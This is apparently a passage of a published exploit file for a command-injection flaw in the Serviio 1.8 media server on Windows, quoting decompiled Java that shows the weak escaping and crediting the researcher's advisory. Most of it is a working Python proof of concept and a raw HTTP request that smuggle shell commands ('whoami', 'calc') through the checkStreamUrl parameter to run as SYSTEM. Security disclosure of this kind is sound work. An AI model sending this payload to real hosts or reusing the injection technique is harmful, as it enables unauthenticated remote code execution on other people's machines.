|
||||||
|
# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
|
||||||
|
# String url = StringUtils.trim(representation.getParameters().get(1));
|
||||||
|
# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
|
||||||
|
# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
|
||||||
|
# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
|
||||||
|
# return this.responseOk();
|
||||||
|
# }
|
||||||
|
# catch (InvalidMediaFormatException e) {
|
||||||
|
# return this.responseOk(603);
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# =================================================================================
|
||||||
|
# serviio.jar / external / ProcessExecutor.java:
|
||||||
|
# ----------------------------------------------
|
||||||
|
#
|
||||||
|
# private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
|
||||||
|
# HashMap<String, String> newEnv = new HashMap<String, String>();
|
||||||
|
# newEnv.putAll(System.getenv());
|
||||||
|
# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
|
||||||
|
# i18n[0] = new ProcessExecutorParameter("cmd");
|
||||||
|
# i18n[1] = new ProcessExecutorParameter("/C");
|
||||||
|
# for (int counter = 0; counter < this.commandArguments.length; ++counter) {
|
||||||
|
# ProcessExecutorParameter argument = this.commandArguments[counter];
|
||||||
|
# String envName = "JENV_" + counter;
|
||||||
|
# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
|
||||||
|
# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
|
||||||
|
# if (!quotesNeededForWindows) {
|
||||||
|
# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
|
||||||
|
# }
|
||||||
|
# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
|
||||||
|
# }
|
||||||
|
# this.commandArguments = i18n;
|
||||||
|
# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
|
||||||
|
# newEnv.put("HOMEDRIVE", tempPath[0]);
|
||||||
|
# newEnv.put("HOMEPATH", tempPath[1]);
|
||||||
|
# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
|
||||||
|
# if (log.isTraceEnabled()) {
|
||||||
|
# log.trace(String.format("Env variables: %s", newEnv.toString()));
|
||||||
|
# }
|
||||||
|
# return newEnv;
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
|
||||||
|
# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
|
||||||
|
# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
|
||||||
|
# return quotesNeeded;
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# private String escapeAmpersandForWindows(String value) {
|
||||||
|
# return value.replaceAll("&", "^&");
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# =================================================================================
|
||||||
|
#
|
||||||
|
# Tested on: Restlet-Framework/2.2
|
||||||
|
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Java/1.8.0_121
|
||||||
|
# Java/1.8.0_111
|
||||||
|
# Java/1.8.0_91
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5408
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
|
||||||
|
#
|
||||||
|
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 12.12.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
|
||||||
|
# output in it and start a calc.exe child process as nt authority\system.
|
||||||
|
#
|
||||||
|
|
||||||
|
from urllib2 import Request, urlopen
|
||||||
|
import sys
|
||||||
|
|
||||||
|
if (len(sys.argv) <= 1):
|
||||||
|
print '[*] Usage: serviio_rce.py <ip address>'
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
|
||||||
|
values = """
|
||||||
|
<action>
|
||||||
|
<name>checkStreamUrl</name>
|
||||||
|
<parameter>VIDEO</parameter>
|
||||||
|
<parameter>1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'</parameter>
|
||||||
|
</action>"""
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Content-Type': 'application/xml',
|
||||||
|
'Accept': 'application/xml'
|
||||||
|
}
|
||||||
|
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
|
||||||
|
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
print response_body
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Raw request:
|
||||||
|
|
||||||
|
POST /rest/action HTTP/1.1
|
||||||
|
Host: 10.211.55.3:23423
|
||||||
|
Content-Length: 93
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
Origin: http://10.211.55.3:23423
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Referer: http://10.211.55.3:23423/console/
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.8
|
||||||
|
DNT: 1
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
|
||||||
|
|
||||||
|
'''
|
Loading…
Add table
Reference in a new issue